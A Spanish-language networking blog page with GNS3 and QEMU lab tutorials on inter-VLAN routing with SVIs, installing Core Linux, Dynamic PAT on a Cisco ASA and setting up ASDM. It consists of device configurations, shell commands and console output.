Seguridad y Redes

Tips & Video Tutoriales, Wifislax, VMware, GNS3, VirtualBox, CCNA, Cisco Routers & Switches, [ Programming ]

Configuración de SVIs en un Switch de Capa 3

Las VLAN dividen dominios de transmisión en un entorno LAN. Siempre que los host de una VLAN necesitan comunicarse con algun otro host en otra VLAN, debe enrutarse el tráfico entre ellos. Esto se denomina ruteo interVLAN. En los switches Catalyst, se logra al crear interfaces de Capa 3 (Switch Virtual Interface - SVI).

Host1
IP: 10.1.1.5
Default Gateway: 10.1.1.1
Subnet: 255.255.255.0 

Host2
IP: 10.1.2.2
Default Gateway: 10.1.2.1
Subnet: 255.255.255.0
Topologia en GNS3 utilizando la imagen vIOS-L2 y Core Linux.

Configuracion en Core Linux 1.
labs login: delfi
Password:
                                   /\_/\
                                  ( o.o )
                                   > ^ <
                              delfirosales.com
delfi@labs:~$ 
delfi@labs:~$ sudo su
root@labs:/home/delfi# ifconfig eth0 10.1.1.5 netmask 255.255.255.0 up
root@labs:/home/delfi# route add default gw 10.1.1.1
Core Linux 2.
delfi@labs:~$ 
delfi@labs:~$ sudo su
root@labs:/home/delfi# ifconfig eth0 10.1.2.2 netmask 255.255.255.0 up
root@labs:/home/delfi# route add default gw 10.1.2.1
root@labs:/home/delfi# 
Habilitar ruteo en el Switch
vIOS-L2#configure terminal
vIOS-L2(config)#ip routing 
Configuracion y creacion de VLANs
vIOS-L2(config)#interface gigabitEthernet0/1
vIOS-L2(config-if)#switchport access vlan 2
% Access VLAN does not exist. Creating vlan 2
vIOS-L2(config-if)#switchport mode access 
vIOS-L2(config-if)#exit

vIOS-L2(config)#interface gigabitEthernet0/2
vIOS-L2(config-if)#switchport access vlan 3
% Access VLAN does not exist. Creating vlan 3
vIOS-L2(config-if)#switchport mode access 
vIOS-L2(config-if)#exit
Verificacion de las VLANs creadas anterior.
vIOS-L2#show vlan   

VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Gi0/0, Gi0/3
2    VLAN0002                         active    Gi0/1
3    VLAN0003                         active    Gi0/2
100  VLAN100                          active    
200  VLAN0200                         active    
300  VLAN0300                         active    
1002 fddi-default                     act/unsup 
1003 trcrf-default                    act/unsup 
1004 fddinet-default                  act/unsup 
1005 trbrf-default                    act/unsup 

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        0      0   
2    enet  100002     1500  -      -      -        -    -        0      0   
3    enet  100003     1500  -      -      -        -    -        0      0   
100  enet  100100     1500  -      -      -        -    -        0      0   
200  enet  100200     1500  -      -      -        -    -        0      0   
300  enet  100300     1500  -      -      -        -    -        0      0   
1002 fddi  101002     1500  -      -      -        -    -        0      0   
          
VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1003 trcrf 101003     4472  1005   3276   -        -    srb      0      0   
1004 fdnet 101004     1500  -      -      -        ieee -        0      0   
1005 trbrf 101005     4472  -      -      15       ibm  -        0      0   


VLAN AREHops STEHops Backup CRF
---- ------- ------- ----------
1003 7       7       off

Primary Secondary Type              Ports
------- --------- ----------------- ------------------------------------------


Creacion de la SVI 2.
vIOS-L2(config)#interface vlan 2
vIOS-L2(config-if)#ip address 10.1.1.1 255.255.255.0
vIOS-L2(config-if)#no shutdown 
vIOS-L2(config-if)#exit
Creacion de la SVI 3.
vIOS-L2(config)#interface vlan 3
vIOS-L2(config-if)#ip address 10.1.2.1 255.255.255.0
vIOS-L2(config-if)#no shutdown 
vIOS-L2(config-if)#end
vIOS-L2#
Si ingresamos el siguiente comando podremos observar que las interfaces se encuentran arriba.
vIOS-L2#show ip interface brief
Interface              IP-Address      OK? Method Status                Protocol
GigabitEthernet0/0     unassigned      YES unset  up                    up      
GigabitEthernet0/1     unassigned      YES unset  up                    up      
GigabitEthernet0/2     unassigned      YES unset  up                    up      
GigabitEthernet0/3     unassigned      YES unset  up                    up      
Vlan2                  10.1.1.1        YES manual up                    up      
Vlan3                  10.1.2.1        YES manual up                    up      
vIOS-L2#
Tambien podremos observar la tabla de ruteo con el comando show ip route.
vIOS-L2#show ip route
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
       a - application route
       + - replicated route, % - next hop override

Gateway of last resort is not set

      10.0.0.0/8 is variably subnetted, 4 subnets, 2 masks
C        10.1.1.0/24 is directly connected, Vlan2
L        10.1.1.1/32 is directly connected, Vlan2
C        10.1.2.0/24 is directly connected, Vlan3
L        10.1.2.1/32 is directly connected, Vlan3
vIOS-L2#

vIOS-L2#show interfaces vlan 2
Vlan2 is up, line protocol is up 
  Hardware is Ethernet SVI, address is 0000.ab5a.8002 (bia 0000.ab5a.8002)
  Internet address is 10.1.1.1/24
  MTU 1500 bytes, BW 1000000 Kbit/sec, DLY 10 usec, 
     reliability 255/255, txload 1/255, rxload 1/255
  Encapsulation ARPA, loopback not set
  Keepalive not supported 
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:00:10, output never, output hang never
  Last clearing of "show interface" counters never
  Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
  Queueing strategy: fifo
  Output queue: 0/40 (size/max)
  5 minute input rate 0 bits/sec, 0 packets/sec
  5 minute output rate 0 bits/sec, 0 packets/sec
     652 packets input, 98538 bytes, 0 no buffer
     Received 0 broadcasts (0 IP multicasts)
     0 runts, 0 giants, 0 throttles 
     0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored
     17 packets output, 1054 bytes, 0 underruns
     0 output errors, 0 interface resets
     0 unknown protocol drops
     0 output buffer failures, 0 output buffers swapped out
vIOS-L2#
Verificacion de Core Linux 1 a Core Linux 2.


Otros comandos de verificacion.
vIOS-L2#show interfaces vlan 3
vIOS-L2#show interface gigabitEthernet0/0
vIOS-L2#show interfaces gigabitEthernet0/0 switchport
vIOS-L2#show vlan brief
Descargar Core Linux: LinuxCore-6.4.1.img

Linux Core en Qemu

Imágenes ISO de Linux Core Live x86 o x86-64 se pueden descargar de su pagina la versión mas reciente es el Core 6.4.1.

Creación de la imagen Qemu
$ qemu-img.exe create -f qcow2 LinuxCore.img 300M
Iniciar Qemu con la imagen ISO Live de Core Linux
$ qemu-system-i386w.exe -boot d -cdrom Core-6.4.1.iso -hda LinuxCore.img
Instalacion de Syslinux Extensions
$ tce-load -wi syslinux
Creación de una nueva Particion Ext4
$ sudo fdisk /dev/sda

n - Agregar particion
p - Particion primaria
Partition number (1-4): 1
First cylinder (1-25, default 1): ENTER
Last cylinder (1-25, default 25): ENTER
a - bootable flag
Partition number (1-4): 1
w - guardar la tabla de particion y salir

$ mkfs.ext4 /dev/sda1


Instalar el Boot Sector
$ dd if=/usr/local/share/syslinux/mbr.bin of=/dev/sda
Reconstruir /etc/fstab y Montar la Particion /dev/sda1
$ sudo rebuildfstab
$ mount /mnt/sda1
Montar el CDROM y copiar los archivos core.gz y vmlinuz a /mnt/sda1/boot
$ sudo mkdir -p /mnt/sda1/boot/extlinux
$ mount /mnt/sr0
$ sudo cp -p /mnt/sr0/boot/* /mnt/sda1/boot
Instalar el Boot Loader
$ sudo extlinux --install /mnt/sda1/boot/extlinux
Creación del Archivo extlinux.conf
$ sudo vi /mnt/sda1/boot/extlinux/extlinux.conf

DEFAULT core
LABEL core
KERNEL /boot/vmlinuz
APPEND initrd=/boot/core.gz quiet
Creación de directorios
$ sudo mkdir /mnt/sda1/tce
$ sudo chown tc:staff /mnt/sda1/tce
$ touch /mnt/sda1/tce/mydata.tgz
Apagar Linux Core

Despues de apagar Linux Core ingresar desde consola
$ qemu-system-i386w.exe -boot c -hda LinuxCore.img
Habilitar en Linux Core la redirección al Puerto Serial
default core
label core
kernel /boot/vmlinuz console=ttyS0,38400n8
        append initrd=/boot/core.gz quiet
Extaer el archivo core.gz
$ mkdir -p /home/tc/temp/extract
$ sudo cp /mnt/sda1/boot/core.gz /home/tc/temp/
$ cd /home/tc/temp/extract/

$ zcat ../core.gz | sudo cpio -i -H newc -d
Desabilitar Autologin para tty1 y agregar ttyS0
$ sudo vi /etc/inittab

#tty1::respawn:/sbin/getty -nl /sbin/autologin 38400 tty1
tty1::respawn:/sbin/getty 38400 tty1
ttyS0::respawn:/sbin/getty 38400 ttyS0

Personalizar entrada al sistema
$ sudo vi /etc/issue

Bienvenido a Core Linux

Username "tc", password no establecido
Editar /etc/securetty y permitir acceso al Puerto Serial ttyS0
Descomentar la linea #ttyS0
$ sudo vi ./etc/securetty

ttyS0
Pack File core.gz
$ sudo su
$ cd /home/tc/temp/extract/

$ find | cpio -o -H newc | gzip -2 > /mnt/sda1/boot/core.gz

$ cd /home/tc
$ rm -rf /home/tc/temp

Guardar cambios de configuración de Linux Core

Por default al reiniciar Linux Core no se guardan los cambios realizados, para guardar los cambios que se realicen se debe editar el scrpt /opt/bootlocal.sh el cual se ejecuta en cada inicio de la maquina virtual. El único editor que viene instalado en Linux Core es el editor vi, para editar el script bootlocal.sh ingresar el siguiente comando.
$ sudo vi /opt/bootlocal.sh
Por ejemplo si desea mantener la dirección IP para la interface eth0 con la direccion 10.1.1.1/24 y el nombre de host sea labs, añadir las siguientes líneas a este archivo.
sudo hostname labs
sudo ifconfig eth0 10.1.1.1 netmask 255.255.255.0 up

Ejemplo de guardar cambios en los directorios.
sudo vi /opt/.filetool.lst
/etc/inittab
/etc/issue
/etc/securetty
Una vez guardado los cambios en vi, se tendrá que guardar esta configuración mediante otro script llamado filetool.sh, para guardar cambios ejecutar el siguiente comando:
$ filetool.sh -b
Otros comandos utiles para utilizar.

sudo reboot
sudo poweroff

Apagar Core Linux Qemu y verificar.

$ sudo poweroff

Una vez apagado Core Linux Ingresar el siguiente comando para verificar
$ qemu-system-i386w.exe -boot c -hda LinuxCore.img -serial telnet:0.0.0.0:3000,server,nowait
Una vez iniciado Core Linux ejecutar el siguiente comando desde consola.
$ telnet localhost 3000



Dynamic PAT en el Cisco ASA

El Cisco ASA soporta los siguientes tipos mas comunes de NAT.
  • Dynamic NAT: Traducción de muchos a muchos. Traduce las direcciones de origen en las interfaces de seguridad más altos en un rango de direcciones o pool a una interface menos segura para las conexiones salientes.
  • Dynamic PAT: Traducción de muchos a uno. Usualmente un pool de direcciones internas a una interface externa.
  • Static NAT: Traducción de uno a uno, entre una dirección IP en una interface más segura y otra interface menos segura (ejemplo internet) para así poder acceder a los host de una interface de mayor seguridad (ejemplo servidores web en la DMZ) sin exponer la dirección IP real del host en la interface de mayor seguridad.
  • Twice NAT: Permite definir origen y destino desde una sola regla. Son procesadas de acuerdo a la secuencia que fueron insertadas (sin diferenciar estáticos de dinámicos). Puede Referenciar objetos de tipo “network” y “service”.
Configuración Básica de NAT - ASA versión 8.4

Practica en GNS3
Topologia de red Dynamic PAT.

Lo primero es configurar las tres interfaces en el ASA. El segmento de la red ISP está conectada a la interface gigabitEthernet3 con la etiqueta de outside y nivel de seguridad 0. La red interna está conectada a la interface gigabitEthernet1 con etiqueta de nombre inside y con nivel de seguridad 100. El segmento DMZ, donde reside el WebServer está conectado a la interface gigabitEthernet2 del ASA y etiquetado con el nombre de dmz con nivel de seguridad 50.

Datos adicionales:

Interface inside: 192.168.0.1 y es default gateway para los host internos.
Interface dmz: 192.168.1.1 y es el default gateway para los host internos.
Interface outside: 198.51.100.100
Ruta de default: Next-Hop 198.50.100.101

Configuración de la Topología de Red

Configuración PC
Configuración WebServer
!
interface FastEthernet0/0
 ip address 192.168.1.100 255.255.255.0
!         
ip route 0.0.0.0 0.0.0.0 192.168.1.1
!

Configuración ISP
!
interface FastEthernet0/0
 ip address 198.51.100.101 255.255.255.0
 duplex auto
 speed auto
!
interface Serial1/1
 ip address 100.1.1.2 255.255.255.252
 serial restart-delay 0
!
ip route 50.50.50.0 255.255.255.0 100.1.1.1
ip route 89.89.89.0 255.255.255.248 198.51.100.100
ip route 192.168.0.0 255.255.255.0 198.51.100.100
!
Configuración R4
!
interface FastEthernet0/0
 ip address 50.50.50.1 255.255.255.0
 duplex auto
 speed auto
!
interface Serial1/1
 ip address 100.1.1.1 255.255.255.252
 serial restart-delay 0
!
ip route 89.89.89.0 255.255.255.248 Serial1/1
ip route 198.51.100.0 255.255.255.0 Serial1/1
!
Configuración R5
!
interface FastEthernet0/0
 ip address 50.50.50.17 255.255.255.0
 duplex auto
 speed auto
!         
ip route 0.0.0.0 0.0.0.0 50.50.50.1
!
line vty 0 5
 password cisco
 login
!
Configuración del ASA
!
interface GigabitEthernet1
 nameif inside
 security-level 100
 ip address 192.168.0.1 255.255.255.0 
!
interface GigabitEthernet2
 nameif dmz
 security-level 50
 ip address 192.168.1.1 255.255.255.0 
!
interface GigabitEthernet3
 nameif outside
 security-level 0
 ip address 198.51.100.100 255.255.255.0 
!
route outside 0.0.0.0 0.0.0.0 198.51.100.101 1
!

Configuración de Dynamic PAT en el ASA
CiscoASA# configure terminal
CiscoASA(config)# object network red-interna
CiscoASA(config-network-object)# subnet 192.168.0.0 255.255.255.0
CiscoASA(config-network-object)# nat (inside,outside) dynamic interface
CiscoASA(config-network-object)# exit

CiscoASA(config)# object network red-dmz
CiscoASA(config-network-object)# subnet 192.168.1.0 255.255.255.0
CiscoASA(config-network-object)# nat (dmz,outside) dynamic interface
CiscoASA(config-network-object)# end
CiscoASA#

Verificación.
Para verificar que está funcionando, volvemos a intentar realizando un telnet a la ip 50.50.50.17.



Habilitando el debug ip icmp para verificar el comportamiento y algunos comandos shows.
R5#debug ip icmp

CiscoASA# show xlate


CiscoASA# show nat detail
CiscoASA# show nat translated interface outside
CiscoASA# sh  local-host

Cisco ASA & ASDM en GNS3

Herramientas:
Configuración de ASA en GNS3

Abrimos GNS3, nos vamos al menu
Edit > Preference > QEMU > ASA

RAM: 1024 MiB
Number de Nics: 6
Quemu Options: -vnc none -vga none -m 1024 -icount auto -hdachs 980,16,32

Initrd: C:\Program Files\GNS3\ios\IOS_ASA\asa842-initrd.gz
Kernel: C:\Program Files\GNS3\ios\IOS_ASA\asa842-vmlinuz

Kernel cmd line: -append ide_generic.probe_mask=0x01 ide_core.chs=0.0:980,16,32 auto nousb console=ttyS0,9600 bigphysarea=65536

Configuración de ASA en GNS3.

Topologia.
Iniciamos ASA
Loading hardware drivers...
Intel(R) PRO/1000 Network Driver - version 7.3.21-k3-NAPI
Copyright (c) 1999-2006 Intel Corporation.
e1000 0000:00:02.0: found PCI INT A -> IRQ 9
e1000 0000:00:02.0: sharing IRQ 9 with 0000:00:06.0
e1000: 0000:00:02.0: e1000_probe: (PCI:33MHz:32-bit) 00:ab:cd:92:52:00
e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection
e1000 0000:00:03.0: found PCI INT A -> IRQ 11
e1000: 0000:00:03.0: e1000_probe: (PCI:33MHz:32-bit) 00:00:ab:b1:0b:01
e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection
e1000 0000:00:04.0: found PCI INT A -> IRQ 9

e1000: 0000:00:04.0: e1000_probe: (PCI:33MHz:32-bit) 00:00:ab:d6:5c:02
e1000: eth2: e1000_probe: Intel(R) PRO/1000 Network Connection
e1000 0000:00:05.0: found PCI INT A -> IRQ 11
pci 0000:00:01.3: IRQ routing conflict: have IRQ 9, want IRQ 11
e1000: 0000:00:05.0: e1000_probe: (PCI:33MHz:32-bit) 00:00:ab:d1:82:03
e1000: eth3: e1000_probe: Intel(R) PRO/1000 Network Connection
e1000 0000:00:06.0: found PCI INT A -> IRQ 9
e1000 0000:00:06.0: sharing IRQ 9 with 0000:00:02.0
e1000: 0000:00:06.0: e1000_probe: (PCI:33MHz:32-bit) 00:00:ab:52:cb:04
e1000: eth4: e1000_probe: Intel(R) PRO/1000 Network Connection
e1000: 0000:00:07.0: e1000_probe: (PCI:33MHz:32-bit) 00:00:ab:b5:3f:05
e1000: eth5: e1000_probe: Intel(R) PRO/1000 Network Connection
e100: Intel(R) PRO/100 Network Driver, 3.5.23-k6-NAPI
e100: Copyright(c) 1999-2006 Intel Corporation
loaded.
Initializing random number generator... done.
Starting network...
e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth0 entered promiscuous mode
e1000: eth1 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth1 entered promiscuous mode
e1000: eth2 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth2 entered promiscuous mode
e1000: eth3 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth3 entered promiscuous mode
e1000: eth4 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth4 entered promiscuous mode
e1000: eth5 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
device eth5 entered promiscuous mode
Initializing partition -  hda: hda1
done!
mkdosfs 2.11 (12 Mar 2005)

System tables written to disk
dosfsck 2.11, 12 Mar 2005, FAT32, LFN
Starting check/repair pass.
Starting verification pass.
/dev/hda1: 0 files, 0/65463 clusters
dosfsck(/dev/hda1) returned 0
FAT: "posix" option is obsolete, not supported now
TIPC: Started in network mode
TIPC: Own node address <1 data-blogger-escaped-.1.1=".1.1">, network identity 1234
TIPC: Enabled bearer , discovery domain <1 data-blogger-escaped-.1.0=".1.0">, priority 10
msrif: module license 'Cisco Systems, Inc' taints kernel.
msrif module loaded.
Clocksource tsc unstable (delta = 117925313 ns)
grep: /mnt/disk0/.private/startup-config: No such file or directory
Starting Likewise Service Manager
Processor memory 650117120, Reserved memory: 62914560
WARNING: LINA Monitor notification queue not created
No such file or directory
IMAGE ERROR: An error occurred when reading the controller type

Total NICs found: 6
secstore_buf_fill: Error reading secure store -  buffer 0xddfffb08, size 0x14
key_nv_init: read returned error 1, len 129
L4TM: Unknown ASA Model

INFO: Unable to read firewall mode from flash
       Writing default firewall mode (single) to flash
Verify the activation-key, it might take a while...
Failed to retrieve permanent activation key.
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
The Running Activation Key is not valid, using default settings:

Licensed features for this platform:
Maximum Physical Interfaces       : Unlimited      perpetual
Maximum VLANs                     : 100            perpetual
Inside Hosts                      : Unlimited      perpetual
Failover                          : Disabled       perpetual
VPN-DES                           : Disabled       perpetual
VPN-3DES-AES                      : Disabled       perpetual
Security Contexts                 : 0              perpetual
GTP/GPRS                          : Disabled       perpetual
AnyConnect Premium Peers          : 5000           perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 5000           perpetual
Total VPN Peers                   : 0              perpetual
Shared License                    : Disabled       perpetual
AnyConnect for Mobile             : Disabled       perpetual
AnyConnect for Cisco VPN Phone    : Disabled       perpetual
Advanced Endpoint Assessment      : Disabled       perpetual
UC Phone Proxy Sessions           : 2              perpetual
Total UC Proxy Sessions           : 2              perpetual
Botnet Traffic Filter             : Disabled       perpetual
Intercompany Media Engine         : Disabled       perpetual

This platform has an ASA 5520 VPN Plus license.

Cisco Adaptive Security Appliance Software Version 8.4(2)
_le_open: fd:4, name:eth0 ---Device eth0 (fd: 4) opened succesful!
_le_open: fd:8, name:eth1 ---Device eth1 (fd: 8) opened succesful!
_le_open: fd:9, name:eth2 ---Device eth2 (fd: 9) opened succesful!
_le_open: fd:10, name:eth3 ---Device eth3 (fd: 10) opened succesful!
_le_open: fd:11, name:eth4 ---Device eth4 (fd: 11) opened succesful!
_le_open: fd:12, name:eth5 ---Device eth5 (fd: 12) opened succesful!

  ****************************** Warning *******************************
  This product contains cryptographic features and is
  subject to United States and local country laws
  governing, import, export, transfer, and use.
  Delivery of Cisco cryptographic products does not
  imply third-party authority to import, export,
  distribute, or use encryption. Importers, exporters,
  distributors and users are responsible for compliance
  with U.S. and local country laws. By using this
  product you agree to comply with applicable laws and
  regulations. If you are unable to comply with U.S.
  and local laws, return the enclosed items immediately.

  A summary of U.S. laws governing Cisco cryptographic
  products may be found at:
  http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

  If you require further assistance please contact us by
  sending email to export@cisco.com.
  ******************************* Warning *******************************

Copyright (c) 1996-2011 by Cisco Systems, Inc.

                Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

                Cisco Systems, Inc.
                170 West Tasman Drive
                San Jose, California 95134-1706

config_fetcher: channel open failed
ERROR: MIGRATION - Could not get the startup configuration.
COREDUMP UPDATE: open message queue fail: No such file or directory/2

INFO: MIGRATION - Saving the startup errors to file 'flash:upgrade_startup_errors_201210220208.log'
Type help or '?' for a list of available commands.
ciscoasa>

Inicialización de ASA.

Configuración para utilizar ASDM

Para utilizar ASDM debemos configurar algunos parametros minimos como el habilitar la conexion HTTP y crear un usuario.
ciscoasa> enable
Password:
ciscoasa#
ciscoasa# show int ip brief
Interface                  IP-Address      OK? Method Status                Protocol
GigabitEthernet0           unassigned      YES unset  administratively down up
GigabitEthernet1           unassigned      YES unset  administratively down up
GigabitEthernet2           unassigned      YES unset  administratively down up
GigabitEthernet3           unassigned      YES unset  administratively down up
GigabitEthernet4           unassigned      YES unset  administratively down up
GigabitEthernet5           unassigned      YES unset  administratively down up
ciscoasa#
ciscoasa# configure terminal
ciscoasa(config)#

***************************** NOTICE *****************************

Help to improve the ASA platform by enabling anonymous reporting,
which allows Cisco to securely receive minimal error and health
information from the device. To learn more about this feature,
please visit: http://www.cisco.com/go/smartcall

Would you like to enable anonymous error reporting to help improve
the product? [Y]es, [N]o, [A]sk later:
ciscoasa(config)#
ciscoasa(config)# interface gigabitEthernet0
ciscoasa(config-if)# ip address 192.168.2.1 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# nameif management
INFO: Security level for "management" set to 0 by default.
ciscoasa(config-if)# http server enable
ciscoasa(config)#
ciscoasa(config)# http 192.168.2.2 255.255.255.255 management
ciscoasa(config)# username delfirosales password cisco privilege 15
ciscoasa(config)# end
ciscoasa#

Configuración básica para utilizar ASDM.

Realizamos una prueba de conectividad con la interface Loopback de nuestra PC que tiene la direccion IP 192.168.2.2
ciscoasa# ping 192.168.2.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.2.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

Tenemos conexion ahora configuramos el TFTP, en mi caso Solarwins que tiene una carpeta por default llamada TFTP-Root donde copiaremos el archivo ASDM asdm-645.bin

Copiar ASDM desde el Servidor TFTP

ciscoasa# copy tftp: flash:
Address or name of remote host []? 192.168.2.2
Source filename []? asdm-645.bin
Destination filename [asdm-645.bin]?
Accessing tftp://192.168.2.2/asdm-645.bin...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Writing current ASDM file disk0:/asdm-645.bin
